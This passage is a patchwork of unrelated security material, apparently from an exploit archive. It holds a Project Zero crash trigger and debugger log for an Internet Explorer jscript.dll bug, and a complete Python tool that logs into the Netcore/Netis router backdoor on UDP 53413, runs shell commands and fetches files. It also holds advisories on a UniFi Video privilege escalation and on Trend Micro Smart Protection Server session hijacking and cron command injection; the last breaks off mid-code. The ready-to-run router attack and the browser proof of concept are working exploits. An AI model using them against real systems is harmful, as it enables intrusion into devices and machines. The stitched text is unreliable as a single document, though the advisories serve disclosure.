02 00000000`129ca0b0 000007fe`edb9c2ec jscript!JsJSONStringify+0x3e4
03 00000000`129ca190 000007fe`edb9a9fe jscript!NatFncObj::Call+0x138
04 00000000`129ca240 000007fe`edb9b234 jscript!NameTbl::InvokeInternal+0x3f8
05 00000000`129ca360 000007fe`edb99852 jscript!VAR::InvokeByName+0x81c
06 00000000`129ca570 000007fe`edb99929 jscript!VAR::InvokeDispName+0x72
07 00000000`129ca5f0 000007fe`edb924b8 jscript!VAR::InvokeByDispID+0x1229
08 00000000`129ca640 000007fe`edb98ec2 jscript!CScriptRuntime::Run+0x5a6
09 00000000`129cb440 000007fe`edb98d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0a 00000000`129cb650 000007fe`edb98b95 jscript!ScrFncObj::Call+0xb7
0b 00000000`129cb6f0 000007fe`edb9e6c0 jscript!CSession::Execute+0x19e
0c 00000000`129cb7c0 000007fe`edba70e7 jscript!COleScript::ExecutePendingScripts+0x17a
0d 00000000`129cb890 000007fe`edba68d6 jscript!COleScript::ParseScriptTextCore+0x267
0e 00000000`129cb980 000007fe`ee2f5251 jscript!COleScript::ParseScriptText+0x56
0f 00000000`129cb9e0 000007fe`eea7b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
10 00000000`129cba60 000007fe`ee2f6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
11 00000000`129cbb40 000007fe`ee2f5c8e MSHTML!CScriptData::CommitCode+0x3d9
12 00000000`129cbd10 000007fe`ee2f5a11 MSHTML!CScriptData::Execute+0x283
13 00000000`129cbdd0 000007fe`eeab46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
14 00000000`129cbe10 000007fe`ee398a5b MSHTML!CHtmParseBase::Execute+0x235
15 00000000`129cbeb0 000007fe`ee272e39 MSHTML!CHtmPost::Broadcast+0x90
16 00000000`129cbef0 000007fe`ee2ccaef MSHTML!CHtmPost::Exec+0x4bb
17 00000000`129cc100 000007fe`ee2cca40 MSHTML!CHtmPost::Run+0x3f
18 00000000`129cc130 000007fe`ee2cda12 MSHTML!PostManExecute+0x70
19 00000000`129cc1b0 000007fe`ee2d0843 MSHTML!PostManResume+0xa1
1a 00000000`129cc1f0 000007fe`ee2b6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1b 00000000`129cc240 000007fe`eeae4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1c 00000000`129cc270 000007fe`ee1d9d75 MSHTML!GlobalWndOnMethodCall+0x240
1d 00000000`129cc310 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1e 00000000`129cc390 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1f 00000000`129cc450 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
20 00000000`129cc4d0 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
21 00000000`129cf750 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
22 00000000`129cf880 000007fe`efb2925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
23 00000000`129cf8b0 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
24 00000000`129cf900 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
25 00000000`129cf930 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:014> !heap -p -a 00000000`04518fc8
address 0000000004518fc8 found in
_DPH_HEAP_ROOT @ 3d31000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3d49750: 4518000 2000
000007feefb88726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000774c4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007746797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007fefd4b10c8 msvcrt!free+0x000000000000001c
000007feedb9bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007feedb9b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007feedbb42cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007feedb919e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007feedba1956 jscript!GcContext::CollectCore+0x000000000000018b
000007feedba17a5 jscript!GcContext::Collect+0x0000000000000025
000007feedbe42f3 jscript!JsCollectGarbage+0x0000000000000023
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007feedb98d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007feedbc2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedbf8ee3 jscript!GCProtectKeyAndCall+0x000000000000009f
000007feedbf97a6 jscript!JSONApplyFilters+0x000000000000014a
000007feedbfa08b jscript!JSONStringifyObject+0x000000000000009b
000007feedbf9e77 jscript!JSONStringifyArray+0x0000000000000253
000007feedbfa2cc jscript!JSONStringifyObject+0x00000000000002dc
000007feedbfec94 jscript!JsJSONStringify+0x00000000000003e4
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007feedb9b234 jscript!VAR::InvokeByName+0x000000000000081c
000007feedb99852 jscript!VAR::InvokeDispName+0x0000000000000072
000007feedb99929 jscript!VAR::InvokeByDispID+0x0000000000001229
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
=========================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1378
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- By opening a malicious web page in Internet Explorer.
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. It might not work very reliably due to the nature of the issue; please see the technical details below):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
// The first two statements are fuzzer-generated filler that leave the stack in
// the state needed for the uninitialized 'length' VAR to be misinterpreted (see
// the technical details); only the slice call is the actual trigger.
var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
// 'this' is the number 1; its object wrapper has no 'length' property, so
// JsArraySlice proceeds with a VAR that NameTbl::GetVal never initialized.
Array.prototype.slice.call(1);
</script>
<!--
============================================
Technical details:
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).
JsArraySlice looks approximately like:
// Approximate reconstruction from the report, not recovered source.
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
VAR object;
// Never initialized here; only written by GetVal when the property exists.
VAR length;
NameTbl *nametable;
if(!ConvertToObject(session, this, &object, 0)) {
//set error and return
}
if(!IsJSObject(&object, &nametable)) {
//set error and return
}
// Bug: this check assumes a missing 'length' property yields a negative return,
// but GetVal returns 1 in that case and leaves 'length' untouched, so execution
// continues with an uninitialized VAR (see the technical details).
if(nametable->GetVal(&g_sym_length, &length) < 0) {
//set error and return
}
// Reads the uninitialized type field; ConvertToScalar may then dispatch through
// a garbage pointer (InvokeDispatch in the crash below).
if(length->type != TYPE_INT) {
ConvertToScalar(session, &length, &length, 3, 1);
}
...
}
The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).
Debug log:
============================================
(a3c.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> r
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080
r11=5555555511140000 r12=0000000000000000 r13=0000000000000000
r14=000002a7533c5a70 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> k
# Child-SP RetAddr Call Site
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:014> u rip
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]
00007ffa`e45a460c 458bc4 mov r8d,r12d
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax
00007ffa`e45a4614 488bd7 mov rdx,rdi
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]
00007ffa`e45a461b 498bce mov rcx,r14
============================================
-->
#!/usr/bin/python
# -*- coding: utf8 -*-
# NETCORE / NETDIS UDP 53413 BACKDOOR
# https://netisscan.shadowserver.org/
# http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
# https://www.seebug.org/vuldb/ssvid-90227
import socket
import struct
import logging
# Root logger at INFO; socket errors in recv_netcore_response() are logged at DEBUG
# and are therefore hidden unless the level is lowered.
logging.basicConfig(level=logging.INFO, format="%(message)16s")
def create_udp_socket(timeout=10):
    """Return an IPv4 UDP socket whose blocking calls give up after `timeout` seconds."""
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.settimeout(timeout)
    return udp
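def send_netcore_request(sock, host, port, data):
    """Send one MPT datagram to (host, port): an 8-byte zero header followed by `data`.

    `data` may be bytes or str. A str is encoded as latin-1 so each character
    maps to exactly one byte on Python 3; on Python 2, str already is bytes and
    is sent unchanged (the original only worked on Python 2).
    """
    if not isinstance(data, bytes):
        data = data.encode("latin-1")
    sock.sendto(b"\x00" * 8 + data, (host, port))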
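def recv_netcore_response(sock, buffsize=512):
    """Receive one datagram of at most `buffsize` bytes from `sock`.

    Returns (data, addr) on success, or (None, None) when the read times out
    or fails with any other Exception (logged at DEBUG only). The original
    used `finally: return`, which also swallowed KeyboardInterrupt/SystemExit;
    those now propagate.
    """
    try:
        return sock.recvfrom(buffsize)
    except Exception as err:
        logging.debug('[-] %s' % err)
        return None, None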
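def do_mptlogin(sock, host, port):
    """Probe the MPT "login" on host:port.

    Sends the 'netcore' banner command followed by '?', collects the distinct
    replies, and treats the host as vulnerable when any reply carries the
    \\x00\\x00\\x00\\x05 status marker seen in the sample responses below.

    Returns (is_vulnerable, replies).
    """
    marker = b"\x00\x00\x00\x05"
    replies = []
    for command in ('netcore', '?'):
        send_netcore_request(sock, host, port, command)
        resp, _addr = recv_netcore_response(sock)
        if resp and resp not in replies:
            replies.append(resp)
    # Test each reply on its own: the original joined them with "," which fails on
    # Python 3 (bytes vs str) and is equivalent anyway since the marker cannot
    # span the separator.
    vulnerable = any(marker in resp for resp in replies)
    return (vulnerable, replies)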
# ['\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00Login successed!\r\n',
# '\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x7f']
# ['\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x7f',
# '\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00'
# 'IGD MPT Interface daemon 1.0\x00']
# ['\x00\x00\x00\x06\x00\x01\x00\x00\xff\xff\xff\xffapmib_init fail!\r\n']
# ['\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00']
# sh: netcore: not found
# sh: /etc/services: Permission denied
# ['\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00']
# First Login : 'AA\x00\x05ABAA\x00\x00\x00\x00Login successed!\r\n'
# Second Login : IGD MPT Interface daemon 1.0
def do_mptfun(sock, host, port, cmdstring):
    """Send one raw MPT command (`cmdstring`) and return (got_reply, reply).

    `reply` is the raw datagram (or None on timeout). The daemon's own `$Help`
    output lists the built-in commands:

      $Help
      $WriteMac <macaddr> <lan|wan|wlan1|wlan2|wlan3|wlan4>
      $ReadMac <lan|wan|wlan1|wlan2|wlan3|wlan4>[<str|STR>[separator]|bin]
      $WriteRegion <region> <wlan1|wlan3>
      $ReadRegion <wlan1|wlan3>
      $WriteSSID <SSID> <wlan1|wlan2|wlan3|wlan4>
      $ReadSSID <wlan1|wlan2|wlan3|wlan4>

      wlan1: 2.4G main AP        wlan2: 2.4G multiple AP
      wlan3: 5G main AP          wlan4: 5G multiple AP
      region: capitalised country abbreviation, e.g. US, HK, JP
    """
    send_netcore_request(sock, host, port, cmdstring)
    reply, _addr = recv_netcore_response(sock)
    return (bool(reply), reply)
# Alias: plain shell commands (see 'ls -al /tmp' in check()) travel over the same
# channel as the "$" helper commands, so no separate function is needed.
do_syscmd = do_mptfun
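def do_getfile(sock, host, port, filename):
    """Fetch `filename` from the device over the MPT channel.

    The request is an 8-byte header of four big-endian uint16 fields
    (0, 1, 0, 0) followed by the path. Each reply chunk carries the same
    header layout; it is acknowledged by echoing its header with the second
    field set to 5, and the transfer ends with the first chunk shorter than
    the 0x408-byte read size (or on timeout).

    Returns (True, contents) once at least one chunk arrived, else (False, b"").
    `filename` may be bytes or str (str is encoded as latin-1 for Python 3).
    """
    chunk_size = 0x408
    header_len = 8
    if not isinstance(filename, bytes):
        filename = filename.encode("latin-1")
    sock.sendto(struct.pack('>HHHH', 0, 1, 0, 0) + filename, (host, port))
    contents = []
    received = chunk_size
    while received == chunk_size:
        data, _addr = recv_netcore_response(sock, buffsize=chunk_size)
        if not data or len(data) < header_len:
            # Timeout, empty datagram, or a runt that cannot carry a header
            # (the original would have raised struct.error on the runt).
            break
        received = len(data)
        u1, _u2, u3, u4 = struct.unpack('>HHHH', data[:header_len])
        contents.append(data[header_len:])
        # Acknowledge the chunk: same header, second field forced to 5.
        sock.sendto(struct.pack('>HHHH', u1, 5, u3, u4), (host, port))
    return (bool(contents), b"".join(contents))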
def do_putfile():
    """Placeholder: file upload is not implemented; always returns None."""
    return None
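def check(host, port=53413):
    """Probe one host for the MPT backdoor on UDP `port` and print the verdict.

    When the login probe succeeds, one shell command is sent through the same
    channel and its raw reply printed (the original fetched it and discarded
    it). The socket is closed on every path, including when a helper raises.
    Other helpers that can be driven the same way: do_mptfun(sock, host, port,
    '$help') and do_getfile(sock, host, port, '/cfg/dhcpd.conf').
    """
    sock = create_udp_socket(timeout=8)
    try:
        is_login, resp = do_mptlogin(sock, host, port)
        print(is_login, resp)
        if is_login:
            print("[+] %s:%s - \033[32mvulnerable\033[m" % (host, port))
            _ok, resp = do_syscmd(sock, host, port, 'ls -al /tmp')
            print(resp)
    finally:
        sock.close()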
if __name__ == "__main__":
    import sys
    # Exactly one argument: the target address.
    if len(sys.argv) == 2:
        check(sys.argv[1])
    else:
        print("[*] Usage: {} <target-netdis-ip>".format(sys.argv[0]))
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Ubiquiti UniFi Video (Windows)
Vendor URL: https://www.ubnt.com
Type: Improper Handling of Insufficient Permissions or Privileges
[CWE-280]
Date found: 2016-05-24
Date published: 2017-12-20
CVSSv3 Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVE: CVE-2016-6914
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
UniFi Video 3.7.3 (Windows),
UniFi Video 3.7.0 (Windows),
UniFi Video 3.2.2 (Windows),
older versions may be affected too.
4. INTRODUCTION
===============
UniFi Video is a powerful and flexible, integrated IP video management
surveillance system designed to work with Ubiquiti’s UniFi Video Camera product
line. UniFi Video has an intuitive, configurable, and feature‑packed user
interface with advanced features such as motion detection, auto‑discovery,
user-level security, storage management, reporting, and mobile device support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\"
by default and is also shipped with a service called "Ubiquiti UniFi Video". Its
executable "avService.exe" is placed in the same directory and also runs under
the NT AUTHORITY/SYSTEM account.
However the default permissions on the "C:\ProgramData\unifi-video" folder are
inherited from "C:\ProgramData" and are not explicitly overridden, which allows
all users, even unprivileged ones, to append and write files to the application
directory:
c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.
By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an
unprivileged user, it is therefore possible to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM.
6. RISK
=======
To successfully exploit this vulnerability, an attacker must already have access
to a system running a vulnerable installation of UniFi Video through a
low-privileged user account (e.g. obtained via a password compromise).
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM, which basically means a complete loss of
the system's confidentiality, integrity as well as availability.
7. SOLUTION
===========
Update to v3.8.0. As an interim hardening measure, the inherited write/append
permissions for BUILTIN\Users on "C:\ProgramData\unifi-video" (see section 5)
can be removed, so that unprivileged users can no longer place a "taskkill.exe"
in the directory the service loads it from.
8. REPORT TIMELINE
==================
2016-05-24: Discovery of the vulnerability
2016-05-24: Reported to vendor via HackerOne (#140793)
2016-05-24: Vendor acknowledges the vulnerability
2016-08-22: Request for status update
2016-08-22: Vendor states that there is no update so far
2016-08-23: MITRE assigns CVE-2016-6914
2016-11-08: Request for status update
2016-11-08: Vendor states that there is no update so far
2016-12-08: Request for status update
2016-12-08: Vendor states that project team is working on it
2017-02-23: Request for status update
2017-03-23: No response from vendor
2017-03-23: Request for status update
2017-03-23: Vendor states that fix is scheduled for v3.7.0
2017-05-23: v3.7.0 was released, but vulnerability is still exploitable,
vendor notified again
2017-06-07: Vendor states that fix is actually delayed
2017-08-26: Vendor provides beta versions of 3.7.3 and 3.8.0-beta3, which should
fix the issue
2017-08-31: While v3.7.3 is still vulnerable, the issue was fixed in 3.8.0-beta3
2017-09-18: v3.8.0 released publicly
2017-12-20: Public disclosure
9. REFERENCES
=============
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-6914
https://hackerone.com/reports/140793
# Trend Micro Smart Protection Server Multiple Vulnerabilities
## 1. Advisory Information
**Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities
**Advisory ID:** CORE-2017-0008
**Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities
**Date published:** 2017-12-19
**Date of last update:** 2017-12-11
**Vendors contacted:** Trend Micro
**Release mode:** Coordinated release
## 2. Vulnerability Information
**Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** Yes
**CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)
## 3. Vulnerability Description
Trend Micro's website states that:
Trend Micro Smart Protection Server [[1](https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server.
Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system.
## 4. Vulnerable Packages
* Trend Micro Smart Protection Server 3.2 (Build 1085)
Other products and versions might be affected, but they were not tested.
## 5. Vendor Information, Solutions and Workarounds
Trend Micro published the following patches:
* TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556&regs=NABU&lang_loc=1#fragment-4628))
* TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974&regs=NABU&lang_loc=1#fragment-5030))
## 6. Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.
## 7. Technical Description / Proof of Concept Code
In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application.
Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application.
Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges.
Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console.
### 7.1 Session hijacking via log file disclosure
[[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format:
```
2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null,
Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218
```
Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests.
### 7.2 Remote command execution via cron job injection
[[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter.
File /var/www/AdminUI/php/admin_update_program.php:
```
if ($_SERVER['REQUEST_METHOD'] == 'POST'){
[...]
$arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0";
[...]
if ( $arr_au['Program']['UseAUSchedule'] == "1"){
if ( $arr_au['Program']['AUScheduleType'] == "0" ){
$crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*");
}else {
$crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']);
}
$crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1");
$crontab->saveCronFile();
}
if(! $crontab->addToCrontab()){
header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ;
exit;
}
```
File /var/www/AdminUI/php/inc/crontab.php:
```
// Receives the raw POST values (hidTimingMin, hidTimingHour, ...) forwarded by
// admin_update_program.php. Only "0" and empty values are special-cased; anything
// else is stored verbatim, so a minute value such as "* * * * * <cmd> #" is
// accepted and later written into the crontab line by saveCronFile().
function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){
if($min=="0")
$this->minute=0;
elseif($min)
$this->minute=$min; // attacker-controlled, no numeric/range check
else
$this->minute="*";
if($hour=="0")
$this->hour=0;
elseif($hour)
$this->hour=$hour;
else
$this->hour="*";
$this->month=($month) ? $month : "*";
$this->day=($day) ? $day : "*";
$this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*";
}
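// Assembles the crontab line from the fields set by setDateParams() and appends it
// to the open cron file. The fields are concatenated as-is, which is where the
// injected "* * * * * <cmd> #" minute value becomes a second job.
// The trailing newline was lost in extraction ("n" instead of "\n") and is restored.
// Note: the return value is inverted relative to PHP convention (true when fwrite()
// fails); it is kept as in the vendor code because the caller ignores it.
function saveCronFile(){
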